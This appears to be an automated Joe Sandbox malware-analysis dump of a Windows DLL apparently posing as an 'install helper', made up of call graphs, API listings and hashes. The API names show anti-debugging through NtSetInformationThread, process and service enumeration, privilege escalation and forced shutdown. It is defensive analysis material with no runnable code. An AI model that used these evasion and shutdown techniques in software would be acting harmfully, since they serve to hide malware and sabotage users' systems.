66756->66757 66763 6c0337e0 32 API calls std::_Xinvalid_argument 66756->66763 66757->66747 66758->66756 66764 6c032250 30 API calls 66758->66764 66765 6c0326e0 24 API calls 4 library calls 66758->66765 66766 6c169379 RaiseException 66758->66766 66762->66758 66763->66757 66764->66758 66765->66758 66766->66758 66767 6bfe4b53 66768 6c166a43 std::_Facet_Register 4 API calls 66767->66768 66769 6bfe4b5c _Yarn 66768->66769 66770 6c15aec0 2 API calls 66769->66770 66775 6bfe4bae std::ios_base::_Ios_base_dtor 66770->66775 66771 6c00639e 66948 6c170130 18 API calls 2 library calls 66771->66948 66773 6bfe4cff 66774 6bfe5164 CreateFileA CloseHandle 66779 6bfe51ec 66774->66779 66775->66771 66775->66773 66775->66774 66776 6bff245a _Yarn _strlen 66775->66776 66776->66771 66778 6c15aec0 2 API calls 66776->66778 66794 6bff2a83 std::ios_base::_Ios_base_dtor 66778->66794 66925 6c165120 OpenSCManagerA 66779->66925 66781 6bfefc00 66941 6c165240 CreateToolhelp32Snapshot 66781->66941 66783 6c166a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66820 6bfe5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 66783->66820 66786 6bff37d0 Sleep 66831 6bff37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66786->66831 66787 6c15aec0 2 API calls 66787->66820 66788 6c0063b2 66949 6bfe15e0 18 API calls std::ios_base::_Ios_base_dtor 66788->66949 66789 6c165240 4 API calls 66807 6bff053a 66789->66807 66790 6c165240 4 API calls 66812 6bff12e2 66790->66812 66792 6bfeffe3 66792->66789 66799 6bff0abc 66792->66799 66793 6c0064f8 66794->66771 66929 6c150390 66794->66929 66795 6c006ba0 104 API calls 66795->66820 66796 6c006e60 32 API calls 66796->66820 66798 6c165240 4 API calls 66798->66799 66799->66776 66799->66790 66800 6c007090 77 API calls 66800->66820 66801 6c165240 4 API calls 66821 6bff1dd9 66801->66821 66802 6bff211c 66802->66776 66803 6bff241a 66802->66803 66806 6c150390 11 API calls 66803->66806 66804 6c15aec0 2 API calls 66804->66831 66805 
6c02e010 67 API calls 66805->66820 66809 6bff244d 66806->66809 66807->66798 66807->66799 66808 6bfe6722 66938 6c161880 25 API calls 4 library calls 66808->66938 66947 6c165d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66809->66947 66811 6bff2452 Sleep 66811->66776 66812->66801 66812->66802 66813 6bff16ac 66812->66813 66814 6bfe6162 66815 6bfe740b 66816 6c164ff0 4 API calls 66815->66816 66824 6bfe775a _strlen 66816->66824 66817 6c165240 4 API calls 66817->66802 66818 6c006ba0 104 API calls 66818->66831 66819 6c006e60 32 API calls 66819->66831 66820->66771 66820->66781 66820->66783 66820->66787 66820->66795 66820->66796 66820->66800 66820->66805 66820->66808 66820->66814 66821->66802 66821->66817 66822 6c007090 77 API calls 66822->66831 66823 6c02e010 67 API calls 66823->66831 66824->66771 66825 6bfe7ba9 66824->66825 66826 6bfe7b92 66824->66826 66829 6bfe7b43 _Yarn 66824->66829 66828 6c166a43 std::_Facet_Register 4 API calls 66825->66828 66827 6c166a43 std::_Facet_Register 4 API calls 66826->66827 66827->66829 66828->66829 66830 6c15aec0 2 API calls 66829->66830 66840 6bfe7be7 std::ios_base::_Ios_base_dtor 66830->66840 66831->66771 66831->66804 66831->66818 66831->66819 66831->66822 66831->66823 66832 6c164ff0 4 API calls 66843 6bfe8a07 66832->66843 66833 6bfe9d7f 66837 6c166a43 std::_Facet_Register 4 API calls 66833->66837 66834 6bfe9d68 66836 6c166a43 std::_Facet_Register 4 API calls 66834->66836 66835 6bfe962c _strlen 66835->66771 66835->66833 66835->66834 66838 6bfe9d18 _Yarn 66835->66838 66836->66838 66837->66838 66839 6c15aec0 2 API calls 66838->66839 66846 6bfe9dbd std::ios_base::_Ios_base_dtor 66839->66846 66840->66771 66840->66832 66840->66835 66841 6bfe8387 66840->66841 66842 6c164ff0 4 API calls 66851 6bfe9120 66842->66851 66843->66842 66844 6c164ff0 4 API calls 66861 6bfea215 _strlen 66844->66861 66845 6c164ff0 4 API calls 66847 6bfe9624 66845->66847 66846->66771 66846->66844 66852 6bfee8b5 
std::ios_base::_Ios_base_dtor _Yarn _strlen 66846->66852 66939 6c165d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66847->66939 66848 6c166a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66848->66852 66850 6c15aec0 2 API calls 66850->66852 66851->66845 66852->66771 66852->66848 66852->66850 66853 6bfeed02 Sleep 66852->66853 66854 6bfef7b1 66852->66854 66873 6bfee8c1 66853->66873 66940 6c165d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66854->66940 66856 6bfee8dd GetCurrentProcess TerminateProcess 66856->66852 66857 6bfea9bb 66860 6c166a43 std::_Facet_Register 4 API calls 66857->66860 66858 6bfea9a4 66859 6c166a43 std::_Facet_Register 4 API calls 66858->66859 66868 6bfea953 _Yarn _strlen 66859->66868 66860->66868 66861->66771 66861->66857 66861->66858 66861->66868 66862 6c164ff0 4 API calls 66862->66873 66863 6bfefbb8 66864 6bfefbe8 ExitWindowsEx Sleep 66863->66864 66864->66781 66865 6bfef7c0 66865->66863 66866 6bfeb009 66870 6c166a43 std::_Facet_Register 4 API calls 66866->66870 66867 6bfeaff0 66869 6c166a43 std::_Facet_Register 4 API calls 66867->66869 66868->66788 66868->66866 66868->66867 66871 6bfeafa0 _Yarn 66868->66871 66869->66871 66870->66871 66872 6c165960 104 API calls 66871->66872 66874 6bfeb059 std::ios_base::_Ios_base_dtor _strlen 66872->66874 66873->66852 66873->66856 66873->66862 66874->66771 66875 6bfeb42c 66874->66875 66876 6bfeb443 66874->66876 66879 6bfeb3da _Yarn _strlen 66874->66879 66877 6c166a43 std::_Facet_Register 4 API calls 66875->66877 66878 6c166a43 std::_Facet_Register 4 API calls 66876->66878 66877->66879 66878->66879 66879->66788 66880 6bfeb79e 66879->66880 66881 6bfeb7b7 66879->66881 66884 6bfeb751 _Yarn 66879->66884 66882 6c166a43 std::_Facet_Register 4 API calls 66880->66882 66883 6c166a43 std::_Facet_Register 4 API calls 66881->66883 66882->66884 
66883->66884 66885 6c165960 104 API calls 66884->66885 66886 6bfeb804 std::ios_base::_Ios_base_dtor _strlen 66885->66886 66886->66771 66887 6bfebc0f 66886->66887 66888 6bfebc26 66886->66888 66891 6bfebbbd _Yarn _strlen 66886->66891 66889 6c166a43 std::_Facet_Register 4 API calls 66887->66889 66890 6c166a43 std::_Facet_Register 4 API calls 66888->66890 66889->66891 66890->66891 66891->66788 66892 6bfec08e 66891->66892 66893 6bfec075 66891->66893 66896 6bfec028 _Yarn 66891->66896 66895 6c166a43 std::_Facet_Register 4 API calls 66892->66895 66894 6c166a43 std::_Facet_Register 4 API calls 66893->66894 66894->66896 66895->66896 66897 6c165960 104 API calls 66896->66897 66902 6bfec0db std::ios_base::_Ios_base_dtor _strlen 66897->66902 66898 6bfec7bc 66901 6c166a43 std::_Facet_Register 4 API calls 66898->66901 66899 6bfec7a5 66900 6c166a43 std::_Facet_Register 4 API calls 66899->66900 66909 6bfec753 _Yarn _strlen 66900->66909 66901->66909 66902->66771 66902->66898 66902->66899 66902->66909 66903 6bfed3ed 66905 6c166a43 std::_Facet_Register 4 API calls 66903->66905 66904 6bfed406 66906 6c166a43 std::_Facet_Register 4 API calls 66904->66906 66907 6bfed39a _Yarn 66905->66907 66906->66907 66908 6c165960 104 API calls 66907->66908 66910 6bfed458 std::ios_base::_Ios_base_dtor _strlen 66908->66910 66909->66788 66909->66903 66909->66904 66909->66907 66915 6bfecb2f 66909->66915 66910->66771 66911 6bfed8bb 66910->66911 66912 6bfed8a4 66910->66912 66916 6bfed852 _Yarn _strlen 66910->66916 66913 6c166a43 std::_Facet_Register 4 API calls 66911->66913 66914 6c166a43 std::_Facet_Register 4 API calls 66912->66914 66913->66916 66914->66916 66916->66788 66917 6bfedccf 66916->66917 66918 6bfedcb6 66916->66918 66921 6bfedc69 _Yarn 66916->66921 66920 6c166a43 std::_Facet_Register 4 API calls 66917->66920 66919 6c166a43 std::_Facet_Register 4 API calls 66918->66919 66919->66921 66920->66921 66922 6c165960 104 API calls 66921->66922 66924 6bfedd1c std::ios_base::_Ios_base_dtor 66922->66924 
66923 6c164ff0 4 API calls 66923->66852 66924->66771 66924->66923 66926 6c165156 66925->66926 66927 6c1651e8 OpenServiceA 66926->66927 66928 6c16522f 66926->66928 66927->66926 66928->66820 66935 6c1503a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 66929->66935 66930 6c15310e CloseHandle 66930->66935 66931 6c153f5f CloseHandle 66931->66935 66932 6c15251b CloseHandle 66932->66935 66933 6bff37cb 66937 6c165d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66933->66937 66934 6c13c1e0 WriteFile WriteFile WriteFile ReadFile 66934->66935 66935->66930 66935->66931 66935->66932 66935->66933 66935->66934 66950 6c13b730 66935->66950 66937->66786 66938->66815 66939->66835 66940->66865 66942 6c1652a0 std::locale::_Setgloballocale 66941->66942 66943 6c165277 CloseHandle 66942->66943 66944 6c165320 Process32NextW 66942->66944 66945 6c1653b1 66942->66945 66946 6c165345 Process32FirstW 66942->66946 66943->66942 66944->66942 66945->66792 66946->66942 66947->66811 66949->66793 66952 6c13b743 _Yarn __wsopen_s std::locale::_Setgloballocale 66950->66952 66951 6c13c180 66951->66935 66952->66951 66953 6c13bced CreateFileA 66952->66953 66955 6c13aa30 66952->66955 66953->66952 66956 6c13aa43 __wsopen_s std::locale::_Setgloballocale 66955->66956 66957 6c13b3e9 WriteFile 66956->66957 66958 6c13b43d WriteFile 66956->66958 66959 6c13b718 66956->66959 66960 6c13ab95 ReadFile 66956->66960 66957->66956 66958->66956 66959->66952 66960->66956
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: HR^
                                    • API String ID: 4218353326-1341859651
                                    • Opcode ID: 5123df0cc83ce9fc2861a971cd65eac5ecfecf5cd6d2117c57abe9f8bc05991e
                                    • Instruction ID: 13ba9b51f5f0e33ac78a963e5fa2b438f96b56c4b6afab19da896af0a33b7d54
                                    • Opcode Fuzzy Hash: 5123df0cc83ce9fc2861a971cd65eac5ecfecf5cd6d2117c57abe9f8bc05991e
                                    • Instruction Fuzzy Hash: E674F772644B028FC728CF28C8D06A5B7F3EF95314B198A6DC0968B765E778B54BCB50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: }jk$;T55$L@^
                                    • API String ID: 0-4218709813
                                    • Opcode ID: 278475e1851fcffacc4d836e03b9db5b0088ecb9f45fa6914fa95b50e9ad29c3
                                    • Instruction ID: 9c506f6e421e043f6946edb48ca653716478f0718fc499d42488f5e32d02114e
                                    • Opcode Fuzzy Hash: 278475e1851fcffacc4d836e03b9db5b0088ecb9f45fa6914fa95b50e9ad29c3
                                    • Instruction Fuzzy Hash: 533407726447018FC728CF28C8D0A95B7E7EF85314B198A6DC0AA4B775EB78B54BCB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7677 6c165240-6c165275 CreateToolhelp32Snapshot 7678 6c1652a0-6c1652a9 7677->7678 7679 6c1652e0-6c1652e5 7678->7679 7680 6c1652ab-6c1652b0 7678->7680 7683 6c165377-6c1653a1 call 6c172c05 7679->7683 7684 6c1652eb-6c1652f0 7679->7684 7681 6c165315-6c16531a 7680->7681 7682 6c1652b2-6c1652b7 7680->7682 7689 6c1653a6-6c1653ab 7681->7689 7690 6c165320-6c165332 Process32NextW 7681->7690 7685 6c165334-6c16535d call 6c16b920 Process32FirstW 7682->7685 7686 6c1652b9-6c1652be 7682->7686 7683->7678 7687 6c165277-6c165292 CloseHandle 7684->7687 7688 6c1652f2-6c1652f7 7684->7688 7696 6c165362-6c165372 7685->7696 7686->7678 7694 6c1652c0-6c1652d1 7686->7694 7687->7678 7688->7678 7695 6c1652f9-6c165313 7688->7695 7689->7678 7693 6c1653b1-6c1653bf 7689->7693 7690->7696 7694->7678 7695->7678 7696->7678
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C16524E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CreateSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3332741929-0
                                    • Opcode ID: ffa38a5fd806f82b09f5feddd28497b9f5eb8d1b4194c5ec2f7e957e34d985dd
                                    • Instruction ID: 88186afa72a6287c055da25d7454a4bf22f2f197732e04ff17b524da92669582
                                    • Opcode Fuzzy Hash: ffa38a5fd806f82b09f5feddd28497b9f5eb8d1b4194c5ec2f7e957e34d985dd
                                    • Instruction Fuzzy Hash: 1A315C74608340DFD7109F2AC888B1ABBF4AF96744F51492EF898C7BA1D371D8588B52

                                    Control-flow Graph
                                    • Rendered graph not captured; graph nodes call GetCurrentThread and NtSetInformationThread (raw edge list omitted)
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2ea2ffce325a03b2514a4ba0d0661d38603b33fb6a53e6e965e9b75c9aa92f4
                                    • Instruction ID: 722602452fd45cfdf2fbfd1f8eec956efe86996cabe01ac98ccabc47c99e5af2
                                    • Opcode Fuzzy Hash: b2ea2ffce325a03b2514a4ba0d0661d38603b33fb6a53e6e965e9b75c9aa92f4
                                    • Instruction Fuzzy Hash: 9A32C233244B018FC335CF28C8946A5B7E3EF913147698AADC0EA5B665D779B44BCB60

                                    Control-flow Graph
                                    • Rendered graph not captured; graph nodes call GetCurrentThread and NtSetInformationThread (raw edge list omitted)
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CurrentThread
                                    • String ID:
                                    • API String ID: 2882836952-0
                                    • Opcode ID: b7cfd95dc1154b71cb938b90ae78242bcc05b5840560ccd0e68fabe537c2a036
                                    • Instruction ID: c9604fc6897afdf7bdbe46c8637480b4662e212e3722d213223872f2d822b2ee
                                    • Opcode Fuzzy Hash: b7cfd95dc1154b71cb938b90ae78242bcc05b5840560ccd0e68fabe537c2a036
                                    • Instruction Fuzzy Hash: 9151CF335047019FC332CF28C8847A5B7A3AF95314F698A5DC0EA1B6B5DB79B44B8B61
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CurrentThread
                                    • String ID:
                                    • API String ID: 2882836952-0
                                    • Opcode ID: 271b471a3c14063fc512384a8a29c7194ff3e5af7d4d133f6982d151ea6e6d70
                                    • Instruction ID: b59c0d057ff6b37ec720010d25405068f11b9223f1a0136345d3c4d06ecad970
                                    • Opcode Fuzzy Hash: 271b471a3c14063fc512384a8a29c7194ff3e5af7d4d133f6982d151ea6e6d70
                                    • Instruction Fuzzy Hash: 0F51E033504B119BC331CF28C4847A5B7A3BF85314F258A5DC0EA5B2B5DB78B44B8BA1
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6BFE3E9D
                                    • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BFE3EAA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Thread$CurrentInformation
                                    • String ID:
                                    • API String ID: 1650627709-0
                                    • Opcode ID: c123e4544efe1767c5cfac96eb72f7bad0cd8d5e2a96775aa6256dae87de1170
                                    • Instruction ID: 81c8922bf57a2714f5d4e558802799448d54182b1ba8164c28ff6d0f136d3235
                                    • Opcode Fuzzy Hash: c123e4544efe1767c5cfac96eb72f7bad0cd8d5e2a96775aa6256dae87de1170
                                    • Instruction Fuzzy Hash: 18310233505B01DBC731CF28C8987E6B7A3AF96314F258A5DC0A65B2A1DB78700A8B61
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6BFE3E9D
                                    • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BFE3EAA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Thread$CurrentInformation
                                    • String ID:
                                    • API String ID: 1650627709-0
                                    • Opcode ID: 7ad66dc5fa80b18c496fcab9393d63c9014312b1e51e2fced9a41d185e48fb27
                                    • Instruction ID: a686e870243011e7840370539b0e69f7bf59946148303842d761874f54b9b8de
                                    • Opcode Fuzzy Hash: 7ad66dc5fa80b18c496fcab9393d63c9014312b1e51e2fced9a41d185e48fb27
                                    • Instruction Fuzzy Hash: 98310133104701DBC735CF28C4987A6B7B2AF92304F254A5CC0EA5B2B5DB79B406CB61
                                    APIs
                                    • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C165130
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ManagerOpen
                                    • String ID:
                                    • API String ID: 1889721586-0
                                    • Opcode ID: 06e3c3c830669a9e0f74771e70f2b1e0fde329b5af76a10ef0d67d55d36fef8b
                                    • Instruction ID: b8cd50b2160f0b8e29c9baf2b097b9fc7df034c3abedfd6a5c9c9bbd39c8adc7
                                    • Opcode Fuzzy Hash: 06e3c3c830669a9e0f74771e70f2b1e0fde329b5af76a10ef0d67d55d36fef8b
                                    • Instruction Fuzzy Hash: 563147B4609301EFC710CF2AC584A0ABBF0AB8A758F51895EF888C7761C371C858DB62
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6BFE3E9D
                                    • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BFE3EAA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Thread$CurrentInformation
                                    • String ID:
                                    • API String ID: 1650627709-0
                                    • Opcode ID: dfddc45d17862a06b9b93c5a09c521e72dee76ea844a0b42f0c8da1f83b272bd
                                    • Instruction ID: f394b5665d31b664a4e9126f4279f64626a908d8608ad03c4fdba2712583f1d6
                                    • Opcode Fuzzy Hash: dfddc45d17862a06b9b93c5a09c521e72dee76ea844a0b42f0c8da1f83b272bd
                                    • Instruction Fuzzy Hash: 91210533518701EBD735CF24C8987AAB7B2AF42304F244A5DD0A64B2B0DB78B4068B71
                                    APIs
                                    • FindFirstFileA.KERNEL32(?,?), ref: 6C15AEDC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: FileFindFirst
                                    • String ID:
                                    • API String ID: 1974802433-0
                                    • Opcode ID: 463a5cb9b15cfdcd59f737340673275f6f910cdfeeee14818fd42bc97e61b7a5
                                    • Instruction ID: ab6393252595d1d3687c6eb21e44c9eb29dea926f6f636b3180ae703e7f9b6f6
                                    • Opcode Fuzzy Hash: 463a5cb9b15cfdcd59f737340673275f6f910cdfeeee14818fd42bc97e61b7a5
                                    • Instruction Fuzzy Hash: 861136B4548350AFD710CB28D94452EBBE4BF86314F948E9AF4B8CB691D335CC948B72
                                    APIs
                                    • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C13ABA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: FileRead
